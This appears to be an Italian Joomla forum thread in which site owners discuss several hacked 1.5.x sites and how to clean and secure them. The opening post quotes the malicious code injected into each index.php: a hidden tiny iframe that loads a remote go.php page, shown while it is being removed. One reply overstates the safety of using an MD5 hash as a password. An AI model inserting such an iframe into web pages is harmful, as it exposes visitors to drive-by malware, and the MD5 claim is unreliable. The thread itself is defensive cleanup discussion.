Hakerati nella stessa giornata 6 miei siti in joomla 1518 e 1520

[joored]

Vari miei siti (6) in joomla 1518 e 1520 questa settimana sono stati hakerati.

Scomparsi i siti viene visualizzato a schermo il seguente messaggio:

Codice: [Seleziona]

Parse error: syntax error, unexpected '<' in /web/htdocs/www._______.it/home/index.php

on line 88
Impossibile entrare anche lato amministrativo.

In sostanza questi idiot_ hanno corrotto tutti i file index.php di ciascun sito (ivi

inclusi i file delle copie di backup, template, ecc..) inserendo un reindirizzamento.

Reindirizzamento fallito per fortuna perché il codice è stato inserito in modo errato.
Ma il danno comunque l'hanno fatto!

Per risolvere ho dovuto aprire ogni file index.php e alla linea 88

sostituire

Codice: [Seleziona]

echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe

src='http://sytratesthj.co.cc/1/go.php?sid=13' width='2' height='2'

frameborder='0'></iframe></body></html>
con

Codice: [Seleziona]

echo JResponse::toString($mainframe->getCfg('gzip'));
Quelli 1518 li sto aggiornando alla 1520 ma mi chiedo:
1) come essere certo di aver ripulito tutti i file corrotti?
2) come fare per impedire che ciò si verifichi ancora?

Aggiornare alla 1520 non basta.

[seflex]

Scarica tutte le cartelle del sito sul pc usando il programma total comander cerca ad esempio http://
e vedi tutte url che trova ed eventualmente elimina.
Ti consiglio di cambiare i tuoi dati di acceso ftp, mysql e cambiare il nome utente e password administrator.
E puoi magari installa un componente per la protezione e stai attento ai permessi di file configuration.php

[alexred]

Ciao joored,
i siti attaccati sono tutti sul solito hosting?
Ci sono estensioni esterne in comune a questi siti?

[jeckodevelopment]

spero che non dipenda da problemi di permessi settati con leggerezza.
Io penso sia dovuto a qualche estensione non aggiornata...

[joored]

Alexred ... si sono ospitati dallo stesso hosting (ar_ _ a), sto provvedendo a segnalare loro il fatto.
Quanto ai componenti esterni installati, solo due hanno in comune sobi2.

Avevo iniziato a ripulire un sito e quando ho finito dopo meno di un'ora ho subito un altro attacco.

Come posso avere certezza di aver cancellato tutto?

Come faccio ad avere velocemente un elenco di tutti i componenti, plugin e moduli installati in ciascun sito ?

[maicolstaip]

Ciao joored,
se per esempio ti hanno sniffato le credenziali ftp, puoi fare tutto quel che vuoi con joomla che rientrano e ti cambiano di nuovo i files.
Sposto nella sezione sicurezza.
Ciao!

[ariess]

Avevo iniziato a ripulire un sito e quando ho finito dopo meno di un'ora ho subito un altro attacco.

scarica i siti e controllali in locale altrimenti ti fanno diventare matto!

[joored]

Li scarico in locale ( d'altronde sono solo 6 siti belli pesanti) e li controllo. Ci vorranno due tre gioni per farlo, ma non ho alternative,
Come giustamente dice maicolstaip cambio le credenziali ftp;

Cambio user e password di accesso.

Ma come posso avere un elenco veloce di tutti i componenti, plugin e moduli installati? Per poter controllare ad auno ad uno gli aggiornamenti?

[spider80]

spero che non dipenda da problemi di permessi settati con leggerezza.
Io penso sia dovuto a qualche estensione non aggiornata...

Ho anch'io lo stesso problema.
- Poichè uso dei moduli fatti da me, può dipendere da questi moduli?

- come posso controllare che i permessi siano impostati correttamente?

[spider80]

Ma come posso avere un elenco veloce di tutti i componenti, plugin e moduli installati? Per poter controllare ad auno ad uno gli aggiornamenti?

da Estensioni-> Installa/Disinstalla -> Moduli (Componenti, Plugin etc..)

[joored]

Con File Zilla vedi i permessi delle cartelle e dei file.
Le cartelle vanno tenute a 0775 e i file a 0664 .... o mi sbaglio?

[joored]

Si lo so Spider ... da Estensioni-> Installa/Disinstalla -> Moduli (Componenti, Plugin etc..), pensavo ci fosse un metodo per avere un elenco complessivo

[joored]

Grazie Seflex,

Scarica tutte le cartelle del sito sul pc usando il programma total comander cerca ad esempio http://
e vedi tutte url che trova ed eventualmente elimina.
Ti consiglio di cambiare i tuoi dati di acceso ftp, mysql e cambiare il nome utente e password administrator.
E puoi magari installa un componente per la protezione e stai attento ai permessi di file configuration.php

Il file configuration.php ha i permessi settati 0664, va bene così?

[jeckodevelopment]

il configuration.php dovrebbe avere 644

[mau_develop]

.. si ma finchè non trovate da che buco passa... lui passa , poimagari li cambia i permessi... a parte che è owner e quindi anche con 644 riesce tranquillamente a leggere tutto.

ho sentito di moduli auto prodotti...
sono entrato in un sito e dal sorgente ho visto un bel gantry...
non ho sentito ancora di scansioni antivirus approfondite sui pc (da avvio provvisorio con rete staccata)

joomla 1.5.20 NON ha problemi, è per forza qualcosa che o vi portate dietro o riguarda vulnerabilità di extensions installate.

per le password... un consiglio:

se la tua password è: sonopippoesonobello, fatti un file pw.php (locale) dove metti un bel <?php md5('sonopippoesonobello'); ?> , dopodichè lo chiami e vedrai una bella stringa md5 della tua password ... usa quell'hash che anche in caso di sqlinj rende impossibile il reverse poichè subisce una seconda criptazione da parte di joomla.
Usate lo stesso sistema ( se consentito) anche per le altre password che, anche se non vengono criptate, sono comunque improbabili da trovare con un brute force.
L'unico 'fastidio' è che quella password non ve la ricorderete di certo a memoria, andrà quindi salvata da qualche parte per essere poi copiata e incollata. Ma tutto questo è oltre i problemi di vulnerabilità.

Provate anche ad installare il tool di mmleoni che potrebbe aiutare a contenere il problema, che va comunque risolto.

M.

[makjla]

Ciao, chiedo scusa se mi aggiungo a questo topic ma anche io ho avuto lo stesso problema. 5 siti web tutti hackerati. Il fatto è che sono anche su hosting diversi. Ora sto cercando di risolvere con le tue indicazioni. Inizialmente ho provato a sostituire gli index.php ma non funziona il pannello dell'amministrazione.

Rettifico. Joored ho provato a seguire le tue indicazioni ma la parte admin non funziona cmq... Qualche consiglio?

EDIT: risolto sostituendo i vari index.php anche nella cartella administrator

[@kshym]

Ciao ragazzi
uno dei miei siti su ar_ _ _ _a è stato attacato, un paio di giorni fa.
ho sostituito index.php e ripartito, oggi è succeso di nuovo.
c'è da qualche parte un certo tipo di manuale come trovare i buchi dei haker.
Prima di tutto come trovare quello che hanno fatto i haker e come coreggerlo.
Secondo come devo proteggermi in futuro

la versione che ho 1.5.15, un amico mi ha suggerito di aggironare al 1.5.20, che dovrebbe risolvere la problemma, ma non penso che aiutera per lungo periodo

Grazie a Tutti

[ariess]

ciao makjla e @kshym

non date per scontato che tutto sia tornato a posto per il semplice fatto che il sito abbia ripreso a funzionare.
sostituire gli index non basta, aggionare joomla o i componenti dopo aver ricevuto l'attacco non serve a niente...

bisogna trovare la falla prima di sentirsi al sicuro. nella sezione sicurezza trovate molti post dove si spiega come risolvere il problema, certo ci vuole moooolta pazienza e un pò di esperienza....
in alternativa rifare l'installazione e mantenerla costantemente aggiornata

[makjla]

@ricdata so bene che ripristinare gli index.php non è una soluzione, infatti uno dei miei siti è stato hackerato due volte in due giorni, ma io ho la versione di joomla aggiornata alla 1.5.20 e pochissime estensioni installate (l'installazione peraltro è stata fatta poco tempo fa) Non credo che rifacendo l'installazione risolverei il problema. Ho provato ad installare un plugin contro gli attacchi hacker che ho visto su questo forum e ora mi documento un pò per vedere cos'altro fare. Onestamente è la prima volta che mi capita una cosa del genere e non so esattamente come muovermi. Grazie comunque per il supporto

[ariess]

avevi la .20 fin dall'inizio o hai aggionato dopo l'attacco?

non credo che rifacendo l'installazione risolverei il problema.

se rifai l'installazione da zero il problema lo risolvi a meno che il problema non sia del server mal configurato o di qualche "vicino" (se sei sul condiviso)

hai provato a chiedere informazioni all'host?